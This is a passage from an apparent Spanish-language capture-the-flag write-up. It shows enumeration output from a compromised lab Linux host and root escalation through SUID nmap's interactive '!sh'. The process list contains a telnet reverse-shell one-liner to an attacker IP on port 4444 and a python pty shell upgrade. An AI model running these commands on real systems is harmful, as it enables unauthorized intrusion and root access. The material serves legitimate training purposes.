-Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager 
-Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy 
org.apache.catalina.startup.Bootstrap
root      5163  0.0  0.4  10596  2556 ?        Ss   06:53   0:00 
/usr/sbin/apache2 -k start
www-data  5164  0.0  0.3  10596  1948 ?        S    06:53   0:00 
/usr/sbin/apache2 -k start
www-data  5166  0.0  0.3  10596  1948 ?        S    06:53   0:00 
/usr/sbin/apache2 -k start
www-data  5168  0.0  0.3  10596  1948 ?        S    06:53   0:00 
/usr/sbin/apache2 -k start
www-data  5171  0.0  0.3  10596  1948 ?        S    06:53   0:00 
/usr/sbin/apache2 -k start
www-data  5173  0.0  0.3  10596  1948 ?        S    06:53   0:00 
/usr/sbin/apache2 -k start
root      5184  0.0  5.1  66344 26480 ?        Sl   06:53   0:00 
/usr/bin/rmiregistry
root      5188  0.0  0.4  12208  2536 ?        Sl   06:53   0:00 ruby 
/usr/sbin/druby_timeserver.rb
root      5194  0.0  0.4   8540  2368 ?        S    06:53   0:00 
/usr/bin/unrealircd
root      5204  0.0  0.0   1716   488 tty1     Ss+  06:53   0:00 /sbin/getty 
38400 tty1
root      5207  0.0  2.3  13924 12012 ?        S    06:53   0:00 Xtightvnc :0 
-desktop X -auth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 
-rfbauth /root/.vnc/passwd -rfbport 5900 -fp 
/usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/
X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/
,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75d
pi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
root      5211  0.0  0.2   2724  1192 ?        S    06:53   0:00 /bin/sh 
/root/.vnc/xstartup
root      5214  0.0  0.4   5936  2576 ?        S    06:53   0:00 xterm 
-geometry 80x24+10+10 -ls -title X Desktop
root      5217  0.0  0.9   8988  4988 ?        S    06:53   0:00 fluxbox
root      5228  0.0  0.2   2852  1544 pts/0    Ss+  06:53   0:00 -bash
daemon    5475  0.0  0.1   1848   532 ?        SN   07:02   0:00 sleep 3980
daemon    5476  0.0  0.1   3164  1024 ?        SN   07:02   0:00 telnet 
10.10.14.6 4444
daemon    5477  0.0  0.1   3240   844 ?        SN   07:02   0:00 sh -c (sleep 
3980|telnet 10.10.14.6 4444|while : ; do sh && break; done 2>&1|telnet 
10.10.14.6 4444 >/dev/null 2>&1 &)
daemon    5478  0.0  0.2   3236  1448 ?        SN   07:02   0:00 sh
daemon    5479  0.0  0.2   3164  1048 ?        SN   07:02   0:00 telnet 
10.10.14.6 4444
daemon    5489  0.0  0.4   3960  2472 ?        SN   07:04   0:00 python -c 
import pty; pty.spawn("/bin/sh")
daemon    5490  0.0  0.3   3372  1796 pts/1    SNs  07:04   0:00 /bin/sh
daemon    5541  0.0  0.3   3680  1920 pts/1    SN+  07:09   0:00 sh lin.sh
daemon    5542  0.0  0.2   3720  1456 pts/1    RN+  07:09   0:00 sh lin.sh
daemon    5544  0.0  0.0   1712   440 pts/1    SN+  07:09   0:00 tee -a
daemon    5773  0.0  0.2   3720  1312 pts/1    RN+  07:09   0:00 sh lin.sh
daemon    5774  0.0  0.1   2364   932 pts/1    RN+  07:09   0:00 ps aux

[-] Process binaries and associated permissions (from above list):
 48K -rwxr-xr-x 1 root root  48K Apr  4  2008 /bin/dd
   0 lrwxrwxrwx 1 root root    4 Apr 28  2010 /bin/sh -> bash
 16K -rwxr-xr-x 1 root root  15K Apr 14  2008 /sbin/getty
 92K -rwxr-xr-x 1 root root  88K Apr 11  2008 /sbin/init
 24K -rwxr-xr-x 1 root root  23K Nov 23  2007 /sbin/klogd
 16K -rwxr-xr-x 1 root root  15K Dec  3  2007 /sbin/portmap
 40K -rwxr-xr-x 1 root root  39K Dec  2  2008 /sbin/rpc.statd
 32K -rwxr-xr-x 1 root root  32K Nov 23  2007 /sbin/syslogd
 72K -rwxr-xr-x 1 root root  67K Apr 11  2008 /sbin/udevd
 32K -rwxr-xr-x 1 root root  31K May 21  2007 /usr/bin/jsvc
   0 lrwxrwxrwx 1 root root   29 Apr 28  2010 /usr/bin/rmiregistry -> 
/etc/alternatives/rmiregistry
1.4M -rwx------ 1 root root 1.4M May 20  2012 /usr/bin/unrealircd
 28K -rwxr-xr-x 1 root root  28K Apr 18  2008 /usr/lib/postfix/master
3.5M -rwxr-xr-x 1 root root 3.5M Mar 21  2008 
/usr/lib/postgresql/8.3/bin/postgres
348K -rwxr-xr-x 1 root root 341K Mar  9  2010 /usr/sbin/apache2
 16K -rwxr-xr-x 1 root root  16K Feb 20  2007 /usr/sbin/atd
 32K -rwxr-xr-x 1 root root  31K Apr  8  2008 /usr/sbin/cron
7.1M -rwxr-xr-x 1 root root 7.1M Mar 28  2008 /usr/sbin/mysqld
348K -rwxr-xr-x 1 root root 343K Apr  9  2008 /usr/sbin/named
952K -rwxr-xr-x 1 root root 948K Apr 28  2010 /usr/sbin/nmbd
 36K -rwxr-xr-x 1 root root  35K Dec  2  2008 /usr/sbin/rpc.idmapd
 76K -rwxr-xr-x 1 root root  72K Dec  2  2008 /usr/sbin/rpc.mountd
3.0M -rwxr-xr-x 1 root root 3.0M Apr 28  2010 /usr/sbin/smbd
 24K -rwxr-xr-x 1 root root  24K Sep 24  2009 /usr/sbin/snmpd
368K -rwxr-xr-x 1 root root 363K Apr  6  2008 /usr/sbin/sshd
140K -rwxr-xr-x 1 root root 135K Dec  3  2007 /usr/sbin/xinetd

[-] Contents of /etc/inetd.conf:
## netbios-ssn	stream	tcp	nowait	root	/usr/sbin/tcpd	
/usr/sbin/smbd
telnet		stream	tcp	nowait	telnetd	/usr/sbin/tcpd	
/usr/sbin/in.telnetd
## ftp		stream	tcp	nowait	root	/usr/sbin/tcpd	
/usr/sbin/in.ftpd
tftp		dgram	udp	wait	nobody	/usr/sbin/tcpd	
/usr/sbin/in.tftpd /srv/tftp
shell		stream	tcp	nowait	root	/usr/sbin/tcpd	
/usr/sbin/in.rshd
login		stream	tcp	nowait	root	/usr/sbin/tcpd	
/usr/sbin/in.rlogind
exec		stream	tcp	nowait	root	/usr/sbin/tcpd	
/usr/sbin/in.rexecd
ingreslock stream tcp nowait root /bin/bash bash -i

[-] The related inetd binary permissions:
-rwxr-xr-x 1 root root  8216 Nov 22  2007 /usr/sbin/in.rexecd
-rwxr-xr-x 1 root root 15620 Nov 22  2007 /usr/sbin/in.rlogind
-rwxr-xr-x 1 root root 14684 Nov 22  2007 /usr/sbin/in.rshd
-rwxr-xr-x 1 root root 36504 Dec 17  2006 /usr/sbin/in.telnetd
-rwxr-xr-x 1 root root 11596 Dec 17  2006 /usr/sbin/in.tftpd
-rwxr-xr-x 1 root root  4504 Jul 30  2007 /usr/sbin/tcpd
-rwxr-xr-x 1 root root  4504 Jul 30  2007 /usr/sbin/tcpd

[-] Contents of /etc/xinetd.conf:
# Simple configuration file for xinetd
#
# Some defaults, and include /etc/xinetd.d/

defaults
{

# Please note that you need a log_type line to be able to use log_on_success
# and log_on_failure. The default is the following :
# log_type = SYSLOG daemon info

}

includedir /etc/xinetd.d

[-] /etc/xinetd.d is included in /etc/xinetd.conf - associated binary 
permissions are listed below:
total 32
drwxr-xr-x  2 root root 4096 May 20  2012 .
drwxr-xr-x 95 root root 4096 Oct 30 06:52 ..
-rw-r--r--  1 root root  798 Dec  3  2007 chargen
-rw-r--r--  1 root root  660 Dec  3  2007 daytime
-rw-r--r--  1 root root  549 Dec  3  2007 discard
-rw-r--r--  1 root root  580 Dec  3  2007 echo
-rw-r--r--  1 root root  727 Dec  3  2007 time
-rw-r--r--  1 root root  576 May 20  2012 vsftpd

[-] /etc/init.d/ binary permissions:
total 376
drwxr-xr-x  2 root root  4096 May 20  2012 .
drwxr-xr-x 95 root root  4096 Oct 30 06:52 ..
-rw-r--r--  1 root root  1335 Apr 19  2008 README
-rwxr-xr-x  1 root root  5736 Feb  1  2008 apache2
-rwxr-xr-x  1 root root  2653 Apr  7  2008 apparmor
-rwxr-xr-x  1 root root   969 Feb 20  2007 atd
-rwxr-xr-x  1 root root  2426 Apr  9  2008 bind9
-rwxr-xr-x  1 root root  3597 Apr 19  2008 bootclean
-rwxr-xr-x  1 root root  2121 Apr 19  2008 bootlogd
-rwxr-xr-x  1 root root  1768 Apr 19  2008 bootmisc.sh
-rwxr-xr-x  1 root root  3454 Apr 19  2008 checkfs.sh
-rwxr-xr-x  1 root root 10602 Apr 19  2008 checkroot.sh
-rwxr-xr-x  1 root root  6355 May 30  2007 console-screen.sh
-rwxr-xr-x  1 root root  1634 Jan 28  2008 console-setup
-rwxr-xr-x  1 root root  1761 Apr  8  2008 cron
-rwxr-xr-x  1 root root   429 May 14  2012 distcc
-rwxr-xr-x  1 root root  1223 Jun 22  2007 dns-clean
-rwxr-xr-x  1 root root  7195 Apr  4  2008 glibc.sh
-rwxr-xr-x  1 root root  1228 Apr 19  2008 halt
-rwxr-xr-x  1 root root   909 Apr 19  2008 hostname.sh
-rwxr-xr-x  1 root root  4521 Apr 14  2008 hwclock.sh
-rwxr-xr-x  1 root root  4528 Apr 14  2008 hwclockfirst.sh
-rwxr-xr-x  1 root root  1376 Jan 28  2008 keyboard-setup
-rwxr-xr-x  1 root root   944 Apr 19  2008 killprocs
-rwxr-xr-x  1 root root  1729 Nov 23  2007 klogd
-rwxr-xr-x  1 root root   748 Jan 23  2006 loopback
-rwxr-xr-x  1 root root  1399 Feb 25  2008 module-init-tools
-rwxr-xr-x  1 root root   596 Apr 19  2008 mountall-bootclean.sh
-rwxr-xr-x  1 root root  2430 Apr 19  2008 mountall.sh
-rwxr-xr-x  1 root root  1465 Apr 19  2008 mountdevsubfs.sh
-rwxr-xr-x  1 root root  1544 Apr 19  2008 mountkernfs.sh
-rwxr-xr-x  1 root root   594 Apr 19  2008 mountnfs-bootclean.sh
-rwxr-xr-x  1 root root  1244 Apr 19  2008 mountoverflowtmp
-rwxr-xr-x  1 root root  3123 Apr 19  2008 mtab.sh
-rwxr-xr-x  1 root root  5755 Mar 27  2008 mysql
-rwxr-xr-x  1 root root  2515 Mar 27  2008 mysql-ndb
-rwxr-xr-x  1 root root  1905 Mar 27  2008 mysql-ndb-mgm
-rwxr-xr-x  1 root root  1772 Dec  3  2007 networking
-rwxr-xr-x  1 root root  5942 Dec  2  2008 nfs-common
-rwxr-xr-x  1 root root  4411 Dec  2  2008 nfs-kernel-server
-rwxr-xr-x  1 root root  2324 Apr 27  2007 openbsd-inetd
-rwxr-xr-x  1 root root  2377 Oct 23  2007 pcmciautils
-rwxr-xr-x  1 root root  1872 Dec  3  2007 portmap
-rwxr-xr-x  1 root root  4202 Apr 18  2008 postfix
-rwxr-xr-x  1 root root  1170 Mar 21  2008 postgresql-8.3
-rwxr-xr-x  1 root root   375 Oct  4  2007 pppd-dns
-rwxr-xr-x  1 root root  1261 Mar 13  2008 procps
-rwxr-xr-x  1 root root  4848 Feb 20  2008 proftpd
-rwxr-xr-x  1 root root  7891 Apr 19  2008 rc
-rwxr-xr-x  1 root root   522 Apr 19  2008 rc.local
-rwxr-xr-x  1 root root   117 Apr 19  2008 rcS
-rwxr-xr-x  1 root root   692 Apr 19  2008 reboot
-rwxr-xr-x  1 root root  1000 Apr 19  2008 rmnologin
-rwxr-xr-x  1 root root  4945 Apr 10  2008 rsync
-rwxr-xr-x  1 root root  1763 May 25  2004 samba
-rwxr-xr-x  1 root root   955 Oct 23  2007 screen-cleanup
-rwxr-xr-x  1 root root  1199 Apr 19  2008 sendsigs
-rwxr-xr-x  1 root root   585 Apr 19  2008 single
-rwxr-xr-x  1 root root  4215 Apr 19  2008 skeleton
-rwxr-xr-x  1 root root  2747 Sep 24  2009 snmpd
-rwxr-xr-x  1 root root  3839 Apr  6  2008 ssh
-rwxr-xr-x  1 root root   510 Apr 19  2008 stop-bootlogd
-rwxr-xr-x  1 root root   647 Apr 19  2008 stop-bootlogd-single
-rwxr-xr-x  1 root root  3343 Nov 23  2007 sysklogd
-rwxr-xr-x  1 root root  6860 Dec  7  2008 tomcat5.5
-rwxr-xr-x  1 root root  2488 Apr 11  2008 udev
-rwxr-xr-x  1 root root   706 Apr 11  2008 udev-finish
-rwxr-xr-x  1 root root  6358 Apr  7  2008 ufw
-rwxr-xr-x  1 root root  4030 Apr 19  2008 umountfs
-rwxr-xr-x  1 root root  1833 Apr 19  2008 umountnfs.sh
-rwxr-xr-x  1 root root  1863 Apr 19  2008 umountroot
-rwxr-xr-x  1 root root  1815 Apr 19  2008 urandom
-rwxr-xr-x  1 root root  2445 Apr 19  2008 waitnfs.sh
-rwxr-xr-x  1 root root  1626 Mar 12  2008 wpa-ifupdown
-rwxr-xr-x  1 root root  1843 May 13  2008 x11-common
-rwxr-xr-x  1 root root  1896 Dec  3  2007 xinetd
-rwxr-xr-x  1 root root   568 Mar 30  2008 xserver-xorg-input-wacom

### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.6.9p10

[-] MYSQL version:
mysql  Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2

[+] We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin  Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license

Server version		5.0.51a-3ubuntu5
Protocol version	10
Connection		Localhost via UNIX socket
UNIX socket		/var/run/mysqld/mysqld.sock
Uptime:			16 min 54 sec

Threads: 1  Questions: 438  Slow queries: 0  Opens: 419  Flush tables: 1  Open 
tables: 64  Queries per second avg: 0.432

[-] Postgres version:
psql (PostgreSQL) 8.3.1
contains support for command-line editing

[-] Apache version:
Server version: Apache/2.2.8 (Ubuntu)
Server built:   Mar  9 2010 20:45:36

[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/nmap
/usr/bin/gcc
/usr/bin/curl

[-] Installed compilers:
ii  distcc                                2.18.3-4.1ubuntu1                     
  Simple distributed compiler client and serve
ii  g++                                   4:4.2.3-1ubuntu6                      
  The GNU C++ compiler
ii  g++-4.2                               4.2.4-1ubuntu4                        
  The GNU C++ compiler
ii  gcc                                   4:4.2.3-1ubuntu6                      
  The GNU C compiler
ii  gcc-4.2                               4.2.4-1ubuntu4                        
  The GNU C compiler
ii  gcj-4.2                               4.2.4-1ubuntu3                        
  The GNU compiler for Java(TM)
ii  libecj-java                           3.3.0+0728-5                          
  Eclipse Java compiler (library)
ii  libecj-java-gcj                       3.3.0+0728-5                          
  Eclipse Java compiler (native library)

[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1549 Mar 14  2017 /etc/passwd
-rw-r--r-- 1 root root 784 Mar 14  2017 /etc/group
-rw-r--r-- 1 root root 497 May 13  2012 /etc/profile
-rw-r----- 1 root shadow 1171 Mar 14  2017 /etc/shadow

[-] SUID files:
-rwsr-xr-x 1 root root 63584 Apr 14  2008 /bin/umount
-rwsr-xr-- 1 root fuse 20056 Feb 26  2008 /bin/fusermount
-rwsr-xr-x 1 root root 25540 Apr  2  2008 /bin/su
-rwsr-xr-x 1 root root 81368 Apr 14  2008 /bin/mount
-rwsr-xr-x 1 root root 30856 Dec 10  2007 /bin/ping
-rwsr-xr-x 1 root root 26684 Dec 10  2007 /bin/ping6
-rwsr-xr-x 1 root root 65520 Dec  2  2008 /sbin/mount.nfs
-rwsr-xr-- 1 root dhcp 2960 Apr  2  2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 2 root root 107776 Feb 25  2008 /usr/bin/sudoedit
-rwsr-sr-x 1 root root 7460 Jun 25  2008 /usr/bin/X
-rwsr-xr-x 1 root root 8524 Nov 22  2007 /usr/bin/netkit-rsh
-rwsr-xr-x 1 root root 37360 Apr  2  2008 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 12296 Dec 10  2007 /usr/bin/traceroute6.iputils
-rwsr-xr-x 2 root root 107776 Feb 25  2008 /usr/bin/sudo
-rwsr-xr-x 1 root root 12020 Nov 22  2007 /usr/bin/netkit-rlogin
-rwsr-xr-x 1 root root 11048 Dec 10  2007 /usr/bin/arping
-rwsr-sr-x 1 daemon daemon 38464 Feb 20  2007 /usr/bin/at
-rwsr-xr-x 1 root root 19144 Apr  2  2008 /usr/bin/newgrp
-rwsr-xr-x 1 root root 28624 Apr  2  2008 /usr/bin/chfn
-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 23952 Apr  2  2008 /usr/bin/chsh
-rwsr-xr-x 1 root root 15952 Nov 22  2007 /usr/bin/netkit-rcp
-rwsr-xr-x 1 root root 29104 Apr  2  2008 /usr/bin/passwd
-rwsr-xr-x 1 root root 46084 Mar 31  2008 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27  2008 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 269256 Oct  4  2007 /usr/sbin/pppd
-rwsr-xr-- 1 root telnetd 6040 Dec 17  2006 /usr/lib/telnetlogin
-rwsr-xr-- 1 root www-data 10276 Mar  9  2010 /usr/lib/apache2/suexec
-rwsr-xr-x 1 root root 4524 Nov  5  2007 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 165748 Apr  6  2008 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 9624 Aug 17  2009 /usr/lib/pt_chown

[+] Possibly interesting SUID files:
-rwsr-xr-- 1 root dhcp 2960 Apr  2  2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 46084 Mar 31  2008 /usr/bin/mtr

[-] SGID files:
-rwxr-sr-x 1 root shadow 19584 Apr  9  2008 /sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 3192 Apr 22  2008 /usr/bin/Eterm
-rwsr-sr-x 1 root root 7460 Jun 25  2008 /usr/bin/X
-rwxr-sr-x 1 root tty 8192 Dec 12  2007 /usr/bin/bsd-write
-rwxr-sr-x 1 root ssh 76580 Apr  6  2008 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 30508 Mar  8  2008 /usr/bin/mlocate
-rwxr-sr-x 1 root crontab 26928 Apr  8  2008 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 37904 Apr  2  2008 /usr/bin/chage
-rwxr-sr-x 1 root utmp 308228 Oct 23  2007 /usr/bin/screen
-rwxr-sr-x 1 root shadow 16424 Apr  2  2008 /usr/bin/expiry
-rwsr-sr-x 1 daemon daemon 38464 Feb 20  2007 /usr/bin/at
-rwxr-sr-x 1 root utmp 306996 Jan  2  2009 /usr/bin/xterm
-rwxr-sr-x 1 root tty 9960 Apr 14  2008 /usr/bin/wall
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27  2008 /usr/sbin/uuidd
-r-xr-sr-x 1 root postdrop 10312 Apr 18  2008 /usr/sbin/postqueue
-r-xr-sr-x 1 root postdrop 10036 Apr 18  2008 /usr/sbin/postdrop

[+] Hosts.equiv file and contents: 
-rw-r--r-- 1 root root 121 May 20  2012 /etc/hosts.equiv
# /etc/hosts.equiv: list  of  hosts  and  users  that are granted "trusted" r
#		    command access to your system .
+ +


[-] NFS config details: 
-rw-r--r-- 1 root root 367 May 13  2012 /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#		to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync) hostname2(ro,sync)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt)
# /srv/nfs4/homes  gss/krb5i(rw,sync)
#

/	*(rw,sync,no_root_squash,no_subtree_check)


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 552 Apr  9  2008 /etc/pam.conf
-rw-r--r-- 1 root root 899 Nov  6  2007 /etc/gssapi_mech.conf
-rw-r----- 1 root fuse 216 Feb 26  2008 /etc/fuse.conf
-rw-r--r-- 1 root root 2405 Mar 13  2008 /etc/sysctl.conf
-rw-r--r-- 1 root root 2689 Apr  4  2008 /etc/gai.conf
-rw-r--r-- 1 root root 4430 May 20  2012 /etc/vsftpd.conf
-rw-r--r-- 1 root root 2975 Mar 16  2010 /etc/adduser.conf
-rw-r--r-- 1 root root 2969 Mar 11  2008 /etc/debconf.conf
-rw-r--r-- 1 root root 92 Oct 20  2007 /etc/host.conf
-rw-r--r-- 1 root root 13144 Nov 16  2007 /etc/ltrace.conf
-rw-r--r-- 1 root root 423 May 20  2012 /etc/hesiod.conf
-rw-r--r-- 1 root root 34 Mar 16  2010 /etc/ld.so.conf
-rw-r--r-- 1 root root 599 Jun 19  2006 /etc/logrotate.conf
-rw-r--r-- 1 root root 354 Mar  5  2007 /etc/fdmount.conf
-rw-r--r-- 1 root root 529 May 20  2012 /etc/inetd.conf
-rw-r--r-- 1 root root 475 Oct 20  2007 /etc/nsswitch.conf
-rw-r--r-- 1 root root 214 Mar  8  2008 /etc/updatedb.conf
-rw-r--r-- 1 root root 43 Mar 14  2017 /etc/resolv.conf
-rw-r--r-- 1 root root 34 Feb 18  2008 /etc/e2fsck.conf
-rw-r--r-- 1 root root 4793 Mar 28  2008 /etc/hdparm.conf
-rw-r--r-- 1 root root 342 Mar 16  2010 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 417 Mar 27  2008 /etc/mke2fs.conf
-rw-r--r-- 1 root root 15280 Apr 28  2010 /etc/devscripts.conf
-rw-r--r-- 1 root root 1614 Nov 23  2007 /etc/syslog.conf
-rw-r--r-- 1 root root 1260 Feb 21  2008 /etc/ucf.conf
-rw-r--r-- 1 root root 145 Dec  2  2008 /etc/idmapd.conf
-rw-r--r-- 1 root root 600 Oct 23  2007 /etc/deluser.conf
-rw-r--r-- 1 root root 240 Mar 16  2010 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1878 May  4  2008 /etc/cowpoke.conf
-rw-r--r-- 1 root root 289 May 20  2012 /etc/xinetd.conf

[+] Root's history files are accessible!
lrwxrwxrwx 1 root root 9 May 14  2012 /root/.bash_history -> /dev/null

[-] Location and contents (if accessible) of .bash_history file(s):
/home/makis/.bash_history
/home/user/.bash_history

[-] Any interesting mail in /var/mail:
total 12
drwxrwsr-x  2 root mail 4096 Mar 14  2017 .
drwxr-xr-x 15 root root 4096 May 20  2012 ..
-rw-------  1 root mail 1438 Mar 14  2017 root

### SCAN COMPLETE ####################################
En la parte de SUID files vemos que aparece que nmap tiene Setuid activo.

-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
Desde nmap podemos lanzar una shell con privilegios[1] y de ese modo hariamos la escalada de privilegios.

sh-3.2$ nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h  for help
nmap> !sh
sh-3.2# whoami
root

root.txt


Ya solo nos quedaria obtener el flag de root.

sh-3.2# cd /root
sh-3.2# ls
Desktop  reset_logs.sh	root.txt  vnc.log
sh-3.2# cat root.txt
92caac3be140ef409e45721348a4eXXX

End


Y con esto ya tendriamos el flag del "user" y el flag de "root". [1] https://pentestlab.blog/category/privilege-escalation/